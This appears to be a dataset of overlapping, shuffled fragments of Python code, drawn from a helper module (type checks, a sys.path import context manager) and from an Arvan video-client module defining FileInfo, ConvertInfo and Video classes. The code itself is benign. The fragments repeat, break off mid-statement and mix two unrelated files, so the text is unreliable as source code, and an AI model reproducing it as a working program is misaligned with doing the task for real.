>>> # prepends '/path/dir' to sys.path >>>", "--------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value):", "from collections import OrderedDict import sys import os.path as p from importlib import", "value def check_group(value, group): if value not in group: tag = type(value).__name__ msg", "else: return value def check_group(value, group): if value not in group: tag =", "sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None):", "file path from that only basename without .py is used :param extra_dir: str", "that have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections", "oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise", "dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module", "module: str module spec for import or file path from that only basename", "as p from importlib import import_module # --------------------------- # Functions # --------------------------- def", "dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections import OrderedDict import", "# --------------------------- from collections import OrderedDict import sys import os.path as p from", "return value def check_group(value, group): if value not in group: tag = type(value).__name__", "context manager. Temporarily prepends extra dir to sys.path and imports the module, Example:", "# prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\"", "= extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module)", "\"\"\" Import module context manager. Temporarily prepends extra dir to sys.path and imports", "as module: >>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi')", "used :param extra_dir: str or None extra dir to prepend to sys.path if", "oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value = value()", "but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if", "to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py')", "# --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context manager.", "# module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>>", "or file path from that only basename without .py is used :param extra_dir:", "!= p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is", "raise TypeError(msg) else: return value def check_group(value, group): if value not in group:", "{}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag),", "prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>> with", "p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not", "functions that have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from", ">>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec", "__enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type,", "collections import OrderedDict import sys import os.path as p from importlib import import_module", "or None extra dir to prepend to sys.path if module then doesn't change", "module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for", "for import or file path from that only basename without .py is used", "with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>> #", "module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> #", "import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str module", "file then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py')", "class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir to sys.path", "to prepend to sys.path if module then doesn't change sys.path if None if", "encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # ---------------------------", "module spec for import or file path from that only basename without .py", "value not in group: tag = type(value).__name__ msg = 'element {} not in", "type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else:", "p from importlib import import_module # --------------------------- # Functions # --------------------------- def check_type(value,", "__init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import or file", ":param extra_dir: str or None extra dir to prepend to sys.path if module", "module then doesn't change sys.path if None if file then prepends dir if", "if module then doesn't change sys.path if None if file then prepends dir", "import os.path as p from importlib import import_module # --------------------------- # Functions #", "'/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self,", "ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir to sys.path and", "# --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space'", "not in group: tag = type(value).__name__ msg = 'element {} not in group", "not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content):", "if file then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if", "if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir =", "# Imports # --------------------------- from collections import OrderedDict import sys import os.path as", "module: >>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>>", "only basename without .py is used :param extra_dir: str or None extra dir", "else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)):", "Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir'", "# --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if", "p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir)", "os.path as p from importlib import import_module # --------------------------- # Functions # ---------------------------", "= 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def", "change sys.path if None if file then prepends dir if None \"\"\" def", "the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> #", "\"\"\" # --------------------------- # Imports # --------------------------- from collections import OrderedDict import sys", "group): if value not in group: tag = type(value).__name__ msg = 'element {}", "dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with", "from that only basename without .py is used :param extra_dir: str or None", "value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but", "value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received", ">>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main()", "remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir", "'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__", "(extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir", "group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\",", ">>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to", "Imports # --------------------------- from collections import OrderedDict import sys import os.path as p", "import or file path from that only basename without .py is used :param", "sys.path and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as", "# prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main() >>>", "\"\"\" Auxiliary functions that have no dependencies \"\"\" # --------------------------- # Imports #", "# This allows 'Space' instead of 'Space()' if callable(value): value = value() if", "callable(value): value = value() if not isinstance(value, oktypes): tag = type(value).__name__ msg =", "doesn't change sys.path if None if file then prepends dir if None \"\"\"", "msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value", "if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module =", "from importlib import import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes):", "check_group(value, group): if value not in group: tag = type(value).__name__ msg = 'element", "spec for import or file path from that only basename without .py is", "value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes", "of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag =", "expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value", "check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value =", "extra dir to prepend to sys.path if module then doesn't change sys.path if", "self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not None:", "tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise", "Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of 'Space()'", "s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module !=", "= type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else:", ">>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi') >>> module.main()", "tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg)", "return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport:", "Temporarily prepends extra dir to sys.path and imports the module, Example: >>> #", "content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class", "self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir =", "sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not", "if value not in group: tag = type(value).__name__ msg = 'element {} not", "\"\"\" :param module: str module spec for import or file path from that", "then prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else", ">>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>>", "not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir", "import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path'", "import import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This", "isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes)", "OrderedDict import sys import os.path as p from importlib import import_module # ---------------------------", "prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def", "prepends extra dir to sys.path and imports the module, Example: >>> # /path/dir/fi.py", "prepend to sys.path if module then doesn't change sys.path if None if file", "repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\",", "self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return", ">>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\"", "None extra dir to prepend to sys.path if module then doesn't change sys.path", "extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None:", "extra_dir=None): \"\"\" :param module: str module spec for import or file path from", "--------------------------- # Imports # --------------------------- from collections import OrderedDict import sys import os.path", "and imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module:", "--------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir to", "None) and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self):", "sys import os.path as p from importlib import import_module # --------------------------- # Functions", "to sys.path if module then doesn't change sys.path if None if file then", ">>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to", "= type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg)", "TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) #", "if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module", "return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is not None: sys.path.pop(0)", "'Space' instead of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes):", "= import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module: str", ">>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as module:", "sys.path if module then doesn't change sys.path if None if file then prepends", "def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- # Classes #", "= 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value", "imports the module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>>", "s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is None) and", "= remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir = p.dirname(module)", "manager. Temporarily prepends extra dir to sys.path and imports the module, Example: >>>", "--------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily", "import OrderedDict import sys import os.path as p from importlib import import_module #", "module context manager. Temporarily prepends extra dir to sys.path and imports the module,", "dir to prepend to sys.path if module then doesn't change sys.path if None", "{}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value not", "module: >>> # prepends '/path' to sys.path >>> # module = import_module('dir.fi') >>>", "Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra", "str module spec for import or file path from that only basename without", "Import module context manager. Temporarily prepends extra dir to sys.path and imports the", "import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): # This allows", "to sys.path >>> # module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module,", "without .py is used :param extra_dir: str or None extra dir to prepend", "# --------------------------- # Imports # --------------------------- from collections import OrderedDict import sys import", "not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {} but expected {}'.format(tag,", "path from that only basename without .py is used :param extra_dir: str or", "(module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir", "have no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections import", "in group: tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag,", "def __init__(self, module, extra_dir=None): \"\"\" :param module: str module spec for import or", "= value() if not isinstance(value, oktypes): tag = type(value).__name__ msg = 'received {}", "is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if", "# /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path", "with ContextImport('/path/dir/fi.py') as module: >>> # prepends '/path/dir' to sys.path >>> # module", "This allows 'Space' instead of 'Space()' if callable(value): value = value() if not", "def remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir", "remove_py(s): return s[:-3] if s.endswith('.py') else s self.module = remove_py(p.basename(module)) if (extra_dir is", "TypeError(msg) else: return value def check_group(value, group): if value not in group: tag", "s self.module = remove_py(p.basename(module)) if (extra_dir is None) and (module != p.basename(module)): extra_dir", "extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def", "'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value,", "oktypes) raise TypeError(msg) else: return value def check_group(value, group): if value not in", "# --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends extra dir", "if None if file then prepends dir if None \"\"\" def remove_py(s): return", "None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value, traceback): if self.extra_dir is", "None if file then prepends dir if None \"\"\" def remove_py(s): return s[:-3]", "that only basename without .py is used :param extra_dir: str or None extra", "ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path >>> # module", "module = import_module('dir.fi') >>> module.main() \"\"\" def __init__(self, module, extra_dir=None): \"\"\" :param module:", "module, Example: >>> # /path/dir/fi.py >>> with ContextImport('/path/dir/fi.py') as module: >>> # prepends", "prepends dir if None \"\"\" def remove_py(s): return s[:-3] if s.endswith('.py') else s", "{} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag,", "--------------------------- from collections import OrderedDict import sys import os.path as p from importlib", "to sys.path >>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path')", "str or None extra dir to prepend to sys.path if module then doesn't", "module.main() >>> with ContextImport('dir.fi', '/path') as module: >>> # prepends '/path' to sys.path", "is used :param extra_dir: str or None extra dir to prepend to sys.path", "sys.path if None if file then prepends dir if None \"\"\" def remove_py(s):", "allows 'Space' instead of 'Space()' if callable(value): value = value() if not isinstance(value,", "if self.extra_dir is not None: sys.path.insert(0, self.extra_dir) return import_module(self.module) def __exit__(self, exc_type, exc_value,", "# Classes # --------------------------- class ContextImport: \"\"\" Import module context manager. Temporarily prepends", "# Functions # --------------------------- def check_type(value, oktypes): # This allows 'Space' instead of", "importlib import import_module # --------------------------- # Functions # --------------------------- def check_type(value, oktypes): #", "'/path') as module: >>> # prepends '/path' to sys.path >>> # module =", "extra_dir: str or None extra dir to prepend to sys.path if module then", "then doesn't change sys.path if None if file then prepends dir if None", "{} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return value def check_group(value, group):", "raise TypeError(msg) else: return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content)))", "sys.path >>> # module = import_module('fi') >>> module.main() >>> with ContextImport('dir.fi', '/path') as", "module, extra_dir=None): \"\"\" :param module: str module spec for import or file path", "basename without .py is used :param extra_dir: str or None extra dir to", "return value def encode_dict(tag, content): return OrderedDict(((\"t\", tag), (\"c\", content))) # --------------------------- #", ".py is used :param extra_dir: str or None extra dir to prepend to", "as module: >>> # prepends '/path/dir' to sys.path >>> # module = import_module('fi')", "= p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if self.extra_dir is not None: sys.path.insert(0,", "instead of 'Space()' if callable(value): value = value() if not isinstance(value, oktypes): tag", "type(value).__name__ msg = 'received {} but expected {}'.format(tag, oktypes) raise TypeError(msg) else: return", "def check_type(value, oktypes): # This allows 'Space' instead of 'Space()' if callable(value): value", "and (module != p.basename(module)): extra_dir = p.dirname(module) self.extra_dir = extra_dir def __enter__(self): if", ":param module: str module spec for import or file path from that only", "msg = 'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return", "'element {} not in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def", "tag), (\"c\", content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import", "group: tag = type(value).__name__ msg = 'element {} not in group {}'.format(tag, repr(group))", "no dependencies \"\"\" # --------------------------- # Imports # --------------------------- from collections import OrderedDict", "content))) # --------------------------- # Classes # --------------------------- class ContextImport: \"\"\" Import module context", "in group {}'.format(tag, repr(group)) raise TypeError(msg) else: return value def encode_dict(tag, content): return" ]
[ "None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in", "status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at:", "available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert:", "bit_rate: int size: int class Video(DynamicType): codec: str width: int height: int frame_rate:", "import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format:", "'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in", "str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str", "int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str", "tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs): if", "str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str", "str tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self, **kwargs):", "kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info", "self.video = None self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general'])", "for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos =", "bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None", "self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio =", "= self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video'])", "int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str", "channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if", "in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for", "return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time:", "def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution:", "str def __init__(self, **kwargs): self.general = None self.video = None self.audio = None", "'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self):", "def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in", "video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url:", "= [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']:", "__str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo", "class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size: int class", "directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url:", "kwargs['video'] if 'audio' in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs)", "in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del", "thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel def __init__(self,", "= None self.video = None self.audio = None if 'general' in kwargs: self.general", "video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title:", "audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType): video_id:", "kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos'", "= kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel']", "size: int class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate:", "convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size:", "class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self, **kwargs):", "self.resolution class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int", "class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str class", "self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if", "<filename>arvan_client/vod/video.py from typing import List from arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType):", "job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at:", "str def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str", "str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str", "channel_layout: str def __init__(self, **kwargs): self.general = None self.video = None self.audio =", "**kwargs): if 'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if", "convert_info: List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url:", "self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class", "str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def __init__(self,", "self.audio = None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if", "self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list): for convert_info in", "**kwargs): self.general = None self.video = None self.audio = None if 'general' in", "arvan_client.arvan.types import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int", "if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs:", "str bit_rate: int size: int class Video(DynamicType): codec: str width: int height: int", "def __init__(self, **kwargs): self.general = None self.video = None self.audio = None if", "created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos:", "kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos']", "Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType):", "bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout: str def", "kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in", "title: str description: str file_info: FileInfo thumbnail_time: int status: str job_status_url: str available:", "'convert_info' in kwargs: self.convert_info = [] if 'convert_info' in kwargs: if isinstance(kwargs['convert_info'], list):", "str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str]", "in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] =", "class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class", "import DynamicType class FileInfo(DynamicType): class General(DynamicType): duration: int format: str bit_rate: int size:", "del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id'", "self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del", "self.mp4_videos = kwargs['mp4_videos'] del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del", "dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel", "str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel: Channel def", "list): for convert_info in kwargs['convert_info']: self.convert_info.append(ConvertInfo(**convert_info)) del kwargs['convert_info'] if 'mp4_videos' in kwargs: self.mp4_videos", "def __str__(self): return self.resolution class Video(DynamicType): video_id: str title: str description: str file_info:", "frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str channel_layout:", "file_info: FileInfo thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str convert_info:", "List[ConvertInfo] created_at: str updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str", "kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def __str__(self):", "parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url:", "kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if", "str bit_rate: str channel_layout: str def __init__(self, **kwargs): self.general = None self.video =", "super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution", "str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str player_url: str # channel:", "int format: str bit_rate: int size: int class Video(DynamicType): codec: str width: int", "int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str", "= None if 'general' in kwargs: self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video'", "str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at: str updated_at: str", "General(DynamicType): duration: int format: str bit_rate: int size: int class Video(DynamicType): codec: str", "ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return self.resolution class Video(DynamicType):", "int class Video(DynamicType): codec: str width: int height: int frame_rate: str bit_rate: str", "kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__()", "super().__init__(**kwargs) def __str__(self): return self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int", "str width: int height: int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str", "None self.video = None self.audio = None if 'general' in kwargs: self.general =", "updated_at: str completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist:", "self.general.format or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self):", "class Video(DynamicType): video_id: str title: str description: str file_info: FileInfo thumbnail_time: int status:", "str # channel: Channel def __init__(self, **kwargs): if 'convert_info' in kwargs: self.convert_info =", "or super().__str__() class ConvertInfo(DynamicType): audio_bitrate: int video_bitrate: int resolution: str def __str__(self): return", "self.general = self.General(**kwargs['general']) del kwargs['general'] if 'video' in kwargs: if kwargs['video']: self.video =", "str mp4_videos: List[str] hls_playlist: str dash_playlist: str thumbnail_url: str tooltip_url: str video_url: str", "int frame_rate: str bit_rate: str class Audio(DynamicType): codec: str sample_rate: str bit_rate: str", "kwargs: if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if", "if kwargs['video']: self.video = self.Video(**kwargs['video']) del kwargs['video'] if 'audio' in kwargs: if kwargs['audio']:", "in kwargs: if kwargs['audio']: self.audio = self.Audio(**kwargs['audio']) del kwargs['audio'] super().__init__(**kwargs) def __str__(self): return", "completed_at: str parallel_convert: int directory_size: str config_url: str mp4_videos: List[str] hls_playlist: str dash_playlist:", "del kwargs['mp4_videos'] if 'id' in kwargs: kwargs['video_id'] = kwargs.pop('id') del kwargs['channel'] super().__init__(**kwargs) def", "thumbnail_time: int status: str job_status_url: str available: bool convert_mode: str convert_info: List[ConvertInfo] created_at:", "int status: str job_status_url: str available: bool convert_mode: str convert_info: 